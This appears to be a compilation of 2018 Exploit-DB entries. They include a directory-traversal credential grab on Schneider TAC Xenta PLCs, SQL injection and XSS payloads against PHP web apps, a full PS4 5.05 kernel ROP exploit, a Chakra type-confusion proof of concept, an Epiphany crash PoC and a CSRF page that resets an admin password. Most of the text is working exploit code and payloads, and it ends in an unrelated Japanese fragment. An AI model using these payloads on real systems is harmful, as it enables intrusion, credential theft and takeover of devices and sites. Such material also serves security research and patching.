# Exploit Title: TAC Xenta 511 and 911 Credentials Disclosure
# Date: 25.05.2018
# Exploit Author: Marek Cybul
# Vendor Homepage:
https://download.schneider-electric.com/files?p_File_Name=TAC_Xenta_911_SDS-XENTA911.pdf
# Version: 5.17
# Schneider Electric TAC Xenta 911 and 511 PLCs
Directory traversal in help manuals allows for credentials extraction
Devices are not indexed by crawlers like Shodan or Censys due to
ancient SSL configuration,
needed to use old browser to support it (not even s_client, curl or
ncat could connect).
Example URI: /www/help/public/../../../sys/pswd
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
HTTP/1.0 200 OK
root
super user
/
/
/
password
0
900
3
# Exploit Title: CSV Import & Export v1.1.0 - SQL Injection / Cross-Site
Scripting
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/csv-import-export/21105509
# Version: 1.1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The 'offset' and 'db' parameters in the database table
preview query has vulnerabilities.
====================================================
# PoC : SQLi :
Parameter: offset (GET)
Type: UNION query
Demo:
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30&limit=10
Title: Generic UNION query (NULL) - 10 columns
Payload: action=export_getInput&db=car-shop@localhost:3306&table=clients&order=asc&offset=30
UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178707671,0x78564b6846794858636354787350514d467a4863704d7a50735068495a6f7a5552625046616d6273,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL--
STgb&limit=10
====================================================
# PoC : XSS :
Payload =
https://site.com/live-preview/live-preview-db-tables.php?action=export_getInput&db=%3E%27%3E%22%3E%3Cimg%20src=x%20onerror=alert%280%29%3E&table=clients&order=asc&offset=30&limit=10
# Exploit Title: PHP Dashboards NEW v5.5 - 'Login' SQL Injection
# Dork: N/A
# Date: 31.05.2018
# Exploit Author: Kağan Çapar
# Contact: kagancapar@gmail.com
# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104
# Version: 5.5
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.
====================================================
# PoC : SQLi :
POST /php/save/user.php?mode=lookup HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 52
Cookie: PHPSESSID=phcubu5ohtdjnd6g1bmsncro87
Connection: keep-alive
email=test%40test.com&password=test123&dashboardKey=
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: email=test@test.com' AND SLEEP(5) AND
'XnxG'='XnxG&password=test123&dashboardKey=
====================================================
# Exploit Title: Grid Pro Big Data 1.0 - 'test.php' SQL Injection
# Dork: N/A
# Date: 30.05.2018
# Exploit Author: Kağan Çapar
# Vendor Homepage: https://codecanyon.net/item/grid-pro-big-data-table-view-data-grid-with-sort-search-and-filter-for-large-mysql-tables/20395348
# Version: 1.0
# Category: Webapps
# Tested on: Kali Linux
# Description : The multiple parameters in the 'test.php' query contain
SQLi vulnerabilities.
====================================================
# PoC : SQLi :
POST /release/pro_grid_big_data/php/test.php HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/release/pro_grid_big_data/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 430
Connection: keep-alive
page=1&on_home=5&table_name=be¶ms%5B0%5D%5Btype%5D=text¶ms%5B0%5D%5Bvalue%5D=¶ms%5B0%5D%5Bname%5D=Name¶ms%5B1%5D%5Btype%5D=text¶ms%5B1%5D%5Bvalue%5D=¶ms%5B1%5D%5Bname%5D=Surname¶ms%5B2%5D%5Btype%5D=num_range¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bvalue%5D%5B%5D=¶ms%5B2%5D%5Bname%5D=Age¶ms%5B3%5D%5Btype%5D=date¶ms%5B3%5D%5Bvalue%5D=¶ms%5B3%5D%5Bname%5D=Born_date&ordering=none
Parameter: on_home (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: page=2&on_home=5 UNION ALL SELECT
CONCAT(CONCAT('qjbqq','vVWAgYsZnIsAkqERYDgZibFieBTaDlfAymtKvnaO'),'qxbpq'),NULL,NULL,NULL--
LEgG&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
Parameter: params[0][value] (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=%' AND
1906=1906 AND
'%'='¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=%' AND
SLEEP(5) AND
'%'='¶ms[0][name]=Name¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
Parameter: params[0][name] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload:
page=2&on_home=5&table_name=be¶ms[0][type]=text¶ms[0][value]=¶ms[0][name]=Name)
AND SLEEP(5) AND
(2977=2977¶ms[1][type]=text¶ms[1][value]=¶ms[1][name]=Surname¶ms[2][type]=num_range¶ms[2][value][]=¶ms[2][value][]=¶ms[2][name]=Age¶ms[3][type]=date¶ms[3][value]=¶ms[3][name]=Born_date&ordering=none
====================================================
# PS4 5.05 Kernel Exploit
---
## Summary
In this project you will find a full implementation of the second "bpf" kernel exploit for the PlayStation 4 on 5.05. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. This exploit also contains autolaunching code for Mira and Vortex's HEN payload. Subsequent loads will launch the usual payload launcher.
This bug was discovered by qwertyoruiopz, and can be found hosted on his website [here](http://crack.bargains/505k/). The [GitHub Pages site](https://cryptogenic.github.io/PS4-5.05-Kernel-Exploit/) automatically generated from this repository should also work.
Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44818.zip
## Patches Included
The following patches are made by default in the kernel ROP chain:
1) Disable kernel write protection
2) Allow RWX (read-write-execute) memory mapping
3) Syscall instruction allowed anywhere
4) Dynamic Resolving (`sys_dynlib_dlsym`) allowed from any process
4) Custom system call #11 (`kexec()`) to execute arbitrary code in kernel mode
5) Allow unprivileged users to call `setuid(0)` successfully. Works as a status check, doubles as a privilege escalation.
## Payloads included
1) Vortex's HEN (Homebrew Enabler)
2) Mira
## Notes
- The page will crash on successful kernel exploitation, this is normal
## Contributors
Massive credits to the following:
- [qwertyoruiopz](https://twitter.com/qwertyoruiopz)
- [Flatz](https://twitter.com/flat_z)
- [Vortex](https://github.com/xvortex)
- [OpenOrbis Team](https://github.com/OpenOrbis/)
- Anonymous
/*
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
opt(window, arr);
}
The above code will be compiled as follows:
000001a8`8000122b 48b8503dcfd5ff7f0000 mov rax,offset chakra!DOMFastPath<7>::EntrySimpleObjectSlotGetter (00007fff`d5cf3d50) // w.event
000001a8`80001235 48ffd0 call rax
000001a8`80001238 488b8e30bdf0ff mov rcx,qword ptr [rsi-0F42D0h]
000001a8`8000123f f2480f104158 movsd xmm0,mmword ptr [rcx+58h]
000001a8`80001245 f2490f11442418 movsd mmword ptr [r12+18h],xmm0 // arr[0] = 2.3023e-320;
...
As you can see, there's no "ImplicitCallFlags" check after the call to the "EntrySimpleObjectSlotGetter" method. The code was generated based on the assumption that the method has no side effects. But in fact, the method can have side effects. The method wraps the return value using the "CrossSite::MarshalVar" method which traverses up the prototype chain of the given object using the "GetPrototype" method, since the "GetPrototype" method may invoke the "getPrototypeOf" handler of a Proxy object, changing the type of the array in the handler will lead to type confusion.
PoC:
*/
function opt(w, arr) {
arr[0] = 1.1;
let res = w.event;
arr[0] = 2.3023e-320;
return res;
}
function main() {
let f = document.body.appendChild(document.createElement('iframe'));
f.contentWindow;
for (let i = 0; i < 100000; i++) {
opt(window, [1.1]);
}
let set_callback = new f.contentWindow.Function('callback', `
window.__lookupSetter__('event').call(parent, new Proxy({}, {
getPrototypeOf() {
callback();
return {};
}
}));`);
let arr = [1.1];
set_callback(() => {
arr[0] = {};
});
opt(window, arr);
alert(arr);
}
main();
EDB Note ~ http://ps3xploit.com/help/dumper.html
EDB Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44820.zip
## Dumper Help
**Warning**:
Due to the lack of proper checks after exiting the ROP chain, it is possible in some cases to obtain a success message despite an operation failure. For instance, if you choose a path where no device is plugged in, a dumper page will still display a success message despite the fact the dump save could not work. This limitation has already been addressed, the added operation checks will be part of an update to these PS3Xploit tools which will be released in the coming weeks, that update will be final, no more will come after it.
## PLEASE READ FIRST:
- For best results with the flash dumper, here are the recommended steps.
- Open the browser & browse to the ps3xploit.com website, go to the page of the exploit you need. Set the current page as browser homepage. Don't launch the exploit initialization. Close the browser.
- Open the browser. The exploit page will load automatically. Choose your dump path option or download the dump.jpg file if you use the hdd edition.
- Press the exploit initialization button & wait until initialization succeeds. If it fails, follow the refresh/reload instructions on screen.
- Trigger the exploit.
- On success, check your dump with the py checker tool.
## Usage Tips:
- Try using a LAN connection or a solid WiFi connection during exploitation. A weak signal can cause problems.
- If the exploit takes more than 5 minutes to work, reload page, browser, or restart console and try again.
- If you are using a LAN connection and experience network issues, make sure all cables to router are in working order.
log("--- trying kernel exploit --");
function malloc(sz)
{
var backing = new Uint8Array(0x10000+sz);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = backing;
return ptr;
}
function malloc32(sz)
{
var backing = new Uint8Array(0x10000+sz*4);
window.nogc.push(backing);
var ptr = p.read8(p.leakval(backing).add32(0x10));
ptr.backing = new Uint32Array(backing.buffer);
return ptr;
}
var strcpy_helper = new Uint8Array(0x1000);
var where_writeptr_strcpy = p.leakval(strcpy_helper).add32(0x10);
function strcpy(ptr, str)
{
p.write8(where_writeptr_strcpy, ptr);
for (var i = 0; i < str.length; i++)
strcpy_helper[i] = str.charCodeAt(i) & 0xFF;
strcpy_helper[str.length] = 0;
}
var spawnthread = function(name, chain) {
/*
seg000:00000000007FA7D0 sub_7FA7D0 proc near ; DATA XREF: sub_7F8330+5Eo
seg000:00000000007FA7D0 55 push rbp
seg000:00000000007FA7D1 48 89 E5 mov rbp, rsp
seg000:00000000007FA7D4 41 56 push r14
seg000:00000000007FA7D6 53 push rbx
seg000:00000000007FA7D7 48 89 F3 mov rbx, rsi
seg000:00000000007FA7DA 49 89 FE mov r14, rdi
seg000:00000000007FA7DD 48 8D 35 E5 B3 EC 00 lea rsi, aMissingPlteBef ; "Missing PLTE before tRNS"
-> xref:
seg000:00000000007F8380 48 8D 3D 28 D8 EC 00 lea rdi, a1_5_18_0 ; "1.5.18"
seg000:00000000007F8387 48 8D 15 82 23 00 00 lea rdx, sub_7FA710
seg000:00000000007F838E 48 8D 0D 3B 24 00 00 lea rcx, sub_7FA7D0
seg000:00000000007F8395 31 F6 xor esi, esi
seg000:00000000007F8397 49 C7 47 20 00 00 00 00 mov qword ptr [r15+20h], 0
seg000:00000000007F839F 66 41 C7 47 18 00 00 mov word ptr [r15+18h], 0
seg000:00000000007F83A6 49 C7 47 10 00 00 00 00 mov qword ptr [r15+10h], 0
seg000:00000000007F83AE E8 8D 3C D3 00 call sub_152C040
-> code:
m_png = png_create_read_struct(PNG_LIBPNG_VER_STRING, 0, decodingFailed, decodingWarning);
decodingWarning -> contains Missing PLTE before tRNS
decodingFailed -> contains longjmp
seg000:00000000007FA710 sub_7FA710 proc near ; DATA XREF: sub_7F8330+57o
seg000:00000000007FA710 ; sub_7F9DC0+2Eo
seg000:00000000007FA710 55 push rbp
seg000:00000000007FA711 48 89 E5 mov rbp, rsp
seg000:00000000007FA714 48 8B 35 5D B6 E5 02 mov rsi, cs:qword_3655D78
seg000:00000000007FA71B BA 60 00 00 00 mov edx, 60h ; '`'
seg000:00000000007FA720 E8 AB E6 D2 00 call sub_1528DD0
seg000:00000000007FA725 BE 01 00 00 00 mov esi, 1
seg000:00000000007FA72A 48 89 C7 mov rdi, rax
seg000:00000000007FA72D E8 26 6D 80 FF call sub_1458 < longjmp
seg000:00000000007FA732 0F 0B ud2
seg000:00000000007FA732 sub_7FA710 endp
*/
var longjmp = window.webKitBase.add32(0x14e8);
// ThreadIdentifier createThread(ThreadFunction entryPoint, void* data, const char* name)
/*
seg000:00000000001DD17F 48 8D 15 C9 38 4C 01 lea rdx, aWebcoreGccontr ; "WebCore: GCController"
seg000:00000000001DD186 31 F6 xor esi, esi
seg000:00000000001DD188 E8 B3 1B F9 00 call sub_116ED40
*/
var createThread = window.webKitBase.add32(0x779190);
var contextp = malloc32(0x2000);
var contextz = contextp.backing;
contextz[0] = 1337;
var thread2 = new RopChain();
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
thread2.push(window.gadgets["ret"]); // nop
chain(thread2);
p.write8(contextp, window.gadgets["ret"]); // rip -> ret gadget
p.write8(contextp.add32(0x10), thread2.ropframeptr); // rsp
var retv = function() {p.fcall(createThread, longjmp, contextp, p.sptr(name));}
window.nogc.push(contextp);
window.nogc.push(thread2);
return retv;
}
var fd = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
var fd1 = p.syscall("open", p.sptr("/dev/bpf0"), 2).low;
if (fd == (-1 >>> 0))
{
print("kexp failed: no bpf0");
}
var assertcnt = 0;
var assert = function(x)
{
assertcnt++;
if (!x) throw "assertion " + assertcnt + " failed";
}
print("got it");
var bpf_valid = malloc32(0x4000);
var bpf_spray = malloc32(0x4000);
var bpf_valid_u32 = bpf_valid.backing;
var bpf_valid_prog = malloc(0x40);
p.write8(bpf_valid_prog, 0x800/8)
p.write8(bpf_valid_prog.add32(8), bpf_valid)
var bpf_spray_prog = malloc(0x40);
p.write8(bpf_spray_prog, 0x800/8)
p.write8(bpf_spray_prog.add32(8), bpf_spray)
for (var i = 0 ; i < 0x400; )
{
bpf_valid_u32[i++] = 6; // BPF_RET
bpf_valid_u32[i++] = 0;
}
var rtv = p.syscall("ioctl", fd, 0x8010427B, bpf_valid_prog);
assert(rtv.low == 0);
print("okay")
var interrupt1, loop1;
var interrupt2, loop2;
var sock = p.syscall(97, 2, 2)
var kscratch = malloc32(0x100);
var start1 = spawnthread("GottaGoFast", function(thread2){
interrupt1 = thread2.ropframeptr;
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["ret"]); // pop rdx
thread2.push(window.gadgets["pop rdi"]); // pop rdi
thread2.push(fd); // what
thread2.push(window.gadgets["pop rsi"]); // pop rsi
thread2.push(0x8010427B); // what
thread2.push(window.gadgets["pop rdx"]); // pop rdx
thread2.push(bpf_valid_prog); // what
thread2.push(window.gadgets["pop rsp"]); // pop rdx
thread2.push(thread2.ropframeptr.add32(0x800)); // what
thread2.count = 0x100;
var cntr = thread2.count;
thread2.push(window.syscalls[54]); // ioctl
thread2.push_write8(thread2.ropframeptr.add32(cntr*8), window.syscalls[54]); // restore ioctl
thread2.push(window.gadgets["pop rdi"]); // pop rdi
var wherep = thread2.pushSymbolic(); // where
thread2.push(window.gadgets["pop rsi"]); // pop rsi
var whatp = thread2.pushSymbolic(); // where
thread2.push(window.gadgets["mov [rdi], rsi"]); // perform write
thread2.push(window.gadgets["pop rsp"]); // pop rdx
loop1 = thread2.ropframeptr.add32(thread2.count*8);
thread2.push(0x41414141); // what
thread2.finalizeSymbolic(wherep, loop1);
thread2.finalizeSymbolic(whatp, loop1.sub32(8));
})
var krop = new RopChain();
var race = new RopChain();
var ctxp = malloc32(0x2000);
var ctxp1 = malloc32(0x2000);
p.write8(bpf_spray.add32(16), ctxp);
var prefaultlist = [];
function pfd(addr)
{
var page = addr.add32(0);
page.low &= 0xffffc000;
p.syscall("mlock", page, 0x8000);
p.read4(addr);
return addr;
}
function pf(addr){
var page = addr.add32(0);
page.low &= 0xffffc000;
p.syscall("mlock", page, 0x8000);
var ret = addr.add32(0);
while (1)
{
var opcode = (p.read4(ret) & 0xff);
if (opcode == 0xc3)
{
prefaultlist.push(ret);
break;
}
ret.add32inplace(1);
}
return addr;
}
for (var gadgetname in gadgets) {
if (gadgets.hasOwnProperty(gadgetname)) {
if (gadgetname == "stack_chk_fail" || gadgetname == "memset" || gadgetname == "setjmp") continue;
pf(gadgets[gadgetname]);
}
}
/*
67d27: 48 8b 07 mov (%rdi),%rax
67d2a: ff 50 58 callq *0x58(%rax)
12a184d: 48 83 ec 58 sub $0x58,%rsp
12a1851: 89 55 d4 mov %edx,-0x2c(%rbp)
12a1854: 49 89 fd mov %rdi,%r13
12a1857: 49 89 f7 mov %rsi,%r15
12a185a: 49 8b 45 00 mov 0x0(%r13),%rax
12a185e: ff 90 d0 07 00 00 callq *0x7d0(%rax)
6ef2e5: 48 8b 7f 10 mov 0x10(%rdi),%rdi
6ef2e9: ff 20 jmpq *(%rax)
2728a1: 48 8d 7d d8 lea -0x28(%rbp),%rdi
2728a5: ff 50 40 callq *0x40(%rax)
12846b4: 48 8b 77 08 mov 0x8(%rdi),%rsi
12846b8: 48 8b 7f 18 mov 0x18(%rdi),%rdi
12846bc: 48 8b 07 mov (%rdi),%rax
12846bf: ff 50 30 callq *0x30(%rax)
15ca29b: 48 8b 97 b0 00 00 00 mov 0xb0(%rdi),%rdx
15ca2a2: ff 57 70 callq *0x70(%rdi)
f094a: 48 89 e5 mov %rsp,%rbp
f094d: 48 8b 07 mov (%rdi),%rax
f0950: ff 90 20 04 00 00 callq *0x420(%rax)
*/
var ctxp2 = malloc32(0x2000);
var wk2apf = function(off)
{
var addr = window.webKitBase.add32(off);
pf(addr);
return addr;
}
p.write8(ctxp.add32(0x50), 0);
p.write8(ctxp.add32(0x68), ctxp1);
var stackshift_from_retaddr = 0;
p.write8(ctxp1.add32(0x10), wk2apf(0x12a184d));
stackshift_from_retaddr += 8 + 0x58; // call + sub
p.write8(ctxp.add32(0), ctxp2);
p.write8(ctxp.add32(0x10), ctxp2.add32(8));
p.write8(ctxp2.add32(0x7d0), wk2apf(0x6ef2e5))
// rax = ctxp2, rdi = ctxp2 + 8
var iterbase = ctxp2;
for (var i=0; i<0xf; i++)
{
p.write8(iterbase, wk2apf(0x12a184d))
stackshift_from_retaddr += 8 + 0x58; // call + sub
// rax = ctxp2+0x20
p.write8(iterbase.add32(0x7d0+0x20), wk2apf(0x6ef2e5))
p.write8(iterbase.add32(8), iterbase.add32(0x20));
p.write8(iterbase.add32(0x18), iterbase.add32(0x20+8))
iterbase = iterbase.add32(0x20);
}
var raxbase = iterbase;
var rdibase = iterbase.add32(8);
var memcpy = get_jmptgt(webKitBase.add32(0xf8));
memcpy = p.read8(memcpy);
pf(memcpy);
p.write8(raxbase, wk2apf(0x15ca29b))
stackshift_from_retaddr += 8; // call + sub
p.write8(rdibase.add32(0x70), wk2apf(0x12846b4)); // next gadget
stackshift_from_retaddr += 8; // call + sub
p.write8(rdibase.add32(0x18), rdibase); // rdi
p.write8(rdibase.add32(8), krop.ropframeptr); // rax
p.write8(raxbase.add32(0x30), wk2apf(0xf094a)); // next gadget
p.write8(rdibase, raxbase);
p.write8(raxbase.add32(0x420), wk2apf(0x2728a1)); // next gadget
p.write8(raxbase.add32(0x40), memcpy.add32(0xc2-0x90)); // next gadget (memcpy skipping prolog)
var topofchain = stackshift_from_retaddr + 0x28 ;
p.write8(rdibase.add32(0xb0), topofchain); // rdx
for (var i = 0; i < 0x1000/8; i++)
{
p.write8(krop.ropframeptr.add32(i*8), window.gadgets["ret"]);
}
krop.count = 0x10;
/*
f094a: 48 89 e5 mov %rsp,%rbp
f094d: 48 8b 07 mov (%rdi),%rax
f0950: ff 90 20 04 00 00 callq *0x420(%rax)
2728a1: 48 8d 7d d8 lea -0x28(%rbp),%rdi
2728a5: ff 50 40 callq *0x40(%rax)
55566f: 48 01 c7 add %rax,%rdi
555672: 48 89 f8 mov %rdi,%rax
555675: c3 retq
46ef9: 48 8b 07 mov (%rdi),%rax
46efc: c3 retq
1520c6: 48 01 f0 add %rsi,%rax
1520c9: c3 retq
14536b: 48 89 07 mov %rax,(%rdi)
14536e: c3 retq
1570a1f: 48 21 f0 and %rsi,%rax
1570a22: c3 retq
353a71: 48 89 c2 mov %rax,%rdx
353a74: c3 retq
1cee60: 48 89 d0 mov %rdx,%rax
1cee63: c3 retq
15a3faf: 48 89 c7 mov %rax,%rdi
15a3fb2: c3 retq
6c83a: 48 8b 00 mov (%rax),%rax
6c83d: c3 retq
295dbe: ff e7 jmpq *%rdi
*/
p.write8(kscratch.add32(0x420), window.gadgets["pop rdi"]);
p.write8(kscratch.add32(0x40), window.gadgets["pop rax"]);
p.write8(kscratch.add32(0x18), kscratch);
function set_rdi_rbpoff() {
krop.push(window.gadgets["pop rdi"]); // pop rdi
krop.push(kscratch.add32(0x18)); // what
krop.push(wk2apf(0xf094a)); // rbp = rsp
var rbp_off = topofchain - krop.count*8 + 0x28;
krop.push(wk2apf(0x2728a1)); // rbp = rsp
return rbp_off;
}
function add_to_rdi(imm)
{
krop.push(window.gadgets["pop rax"]); // pop rdi
krop.push(imm); // what
krop.push(wk2apf(0x55566f)); // rbp = rsp
}
var rboff = set_rdi_rbpoff();
add_to_rdi(rboff);
var add_rax = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rsi
krop.push(imm); // what
krop.push(wk2apf(0x1520c6)); // add rsi to rax
}
krop.push(wk2apf(0x46ef9)); // deref rdi in rax
add_rax(0x2fa); // what
krop.push(wk2apf(0x14536b)); // write rax to rdi
var shellbuf = malloc32(0x1000);
var write_rax = function(addr)
{
krop.push(window.gadgets["pop rdi"]); // pop rdi
krop.push(addr); // what
krop.push(wk2apf(0x14536b)); // write rax to rdi
}
var load_rax = function(addr)
{
krop.push(window.gadgets["pop rax"]); // pop rax
krop.push(addr); // what
krop.push(wk2apf(0x6c83a)); // deref rax
}
var and_rax = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rdi
krop.push(imm); // what
krop.push(wk2apf(0x1570a1f)); // and rax to rdi
}
var rax_to_rdx = function()
{
krop.push(wk2apf(0x353a71)); // rax to rdx
}
var rdx_to_rax = function()
{
krop.push(wk2apf(0x1cee60)); // rdx to rax
}
var rax_to_rdi = function()
{
krop.push(wk2apf(0x15a3faf)); // rax to rdi
}
var write_to_rax64 = function(imm)
{
krop.push(window.gadgets["pop rsi"]); // pop rdi
krop.push(imm); // what
krop.push(window.gadgets["mov [rax], rsi"]); // pop rdi
}
write_rax(kscratch); // save address in usermode
add_rax(0xc54b4)
write_rax(kscratch.add32(8)); // save address
krop.push(wk2apf(0x82)); // jmp rax
write_rax(kscratch.add32(16)); // save cr0
and_rax(new int64(0xfffeffff,0xffffffff)); // unset bit
rax_to_rdx();
load_rax(kscratch.add32(8))
add_rax(9)
rax_to_rdi();
rdx_to_rax();
krop.push(wk2apf(0x295dbe)); // jmp rdi
/*
Write Anywhere mode
*/
load_rax(kscratch);
add_rax(0x3609a);
krop.push(wk2apf(0x6c83a)); // deref rax
write_rax(kscratch.add32(0x330)); // rando offset lol
// put patches here. example is mprotect patch
load_rax(kscratch);
add_rax(0x3609a);
write_to_rax64(new int64(0x9090FA38,0x90909090)); // patch mprotect
/*
Disable Write Anywhere mode
*/
load_rax(kscratch.add32(8))
add_rax(9)
rax_to_rdi();
load_rax(kscratch.add32(16))
krop.push(wk2apf(0x295dbe)); // jmp rdi
krop.push(wk2apf(0x5cdb9));
krop.push(kscratch.add32(0x1000));
# Exploit Title: Smartshop 1 - SQL Injection
# Date: 2018-06-02
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
# Version: 1
# Tested on: Kali linux
=================================================
# Description :
Smartshop 1 suffers from sql injection which attacker can inject sql
commands .
=================================================
# POC : SQLi
# vulnerable files : [ category.php , product.php , search.php ]
1) category.php :
# Parameter : id
# Type : Union based
# Payload : ' UNION SELECT 1,user(),3,4,5%23
# Vulnerable code :
$id_category =$_GET['id'];
$start = ($page > 1) ? ($page * $perpage) - $perpage : 0;
$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture,
thumbnail FROM product WHERE id_category = '{$id_category}' ORDER BY id
DESC LIMIT {$start}, 16";
$result = $connection->query($queryproduct);
=================================================
2) product.php :
# Parameter : id
# Type : Union based
# Payload : ' UNION SELECT 1,user(),database(),4,5,6%23
# Vulnerable code :
$id_product =$_GET['id'];
$queryproduct = "SELECT id, name, price, description, id_picture, thumbnail
FROM product WHERE id = '{$id_product}'";
$result1 = $connection->query($queryproduct);
=================================================
3) search.php :
# Parameter : searched
# Type : Time-based blind
# Payload : ' AND SLEEP(10)%23
# Vulnerable code :
$word = $_GET['searched'];
$queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture,
thumbnail FROM product WHERE name LIKE '%{$word}%' ORDER BY id DESC LIMIT
{$start}, 16";
$result = $connection->query($queryproduct);
=================================================
Summary:
ephy-session.c in libephymain.so in GNOME Web (aka Epiphany) through 3.28.2.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that triggers access to a NULL URL, as demonstrated by a crafted window.open call, CVE-2018-11396 was assigned to this issue.
PoC:
<script>
win = window.open("hello world");
</script>
Stack trace:
ftw@ftw-box:~$ gdb epiphany
(gdb) run
Starting program: /usr/bin/epiphany
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
[New Thread 0x7fffe08bc700 (LWP 2279)]
[New Thread 0x7fffdee51700 (LWP 2280)]
[New Thread 0x7fffde650700 (LWP 2281)]
[New Thread 0x7fffdcdd5700 (LWP 2282)]
[New Thread 0x7fffd7fff700 (LWP 2283)]
[New Thread 0x7fffd77fe700 (LWP 2284)]
[New Thread 0x7fffd6ffd700 (LWP 2285)]
[New Thread 0x7fffd67fc700 (LWP 2286)]
[New Thread 0x7fffd5b8c700 (LWP 2287)]
[New Thread 0x7fffd538b700 (LWP 2288)]
[New Thread 0x7fff8f486700 (LWP 2294)]
[New Thread 0x7fff8da1e700 (LWP 2304)]
[New Thread 0x7fff8d21d700 (LWP 2305)]
[New Thread 0x7fff8ea7f700 (LWP 2315)]
[Thread 0x7fffd5b8c700 (LWP 2287) exited]
[Thread 0x7fffd67fc700 (LWP 2286) exited]
Thread 15 "pool" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff8ea7f700 (LWP 2315)]
0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
(gdb) bt
#0 0x00007ffff7b75db7 in ?? () from /usr/lib/x86_64-linux-gnu/epiphany-browser/libephymain.so
#1 0x00007ffff7079be6 in ?? () from /usr/lib/x86_64-linux-gnu/libgio-2.0.so.0
#2 0x00007ffff73fe7d0 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#3 0x00007ffff73fde05 in ?? () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#4 0x00007fffefc246db in start_thread (arg=0x7fff8ea7f700) at pthread_create.c:463
#5 0x00007ffff5e4c88f in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
(gdb)
# Exploit Title: Smartshop 1 - Cross site request forgery
# Date: 2018-06-02
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://github.com/smakosh/Smartshop/archive/master.zip
# Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website
# Version: 1
# Tested on: Kali linux
=================================================
# POC : CSRF
# Exploit :
# vulnerable file : editprofile.php
<html>
<head>
<title>Change admin password</title>
</head>
<body>
<form method="POST" action="http://127.0.0.1/clone/Smartshop-master/admin/editprofile.php">
<input type="hidden" name="email" value="decode@test.com">
<input type="hidden" name="password" value="1234">
<input type="hidden" name="confirmation" value="1234">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
==================================================
0x00イベントの背景
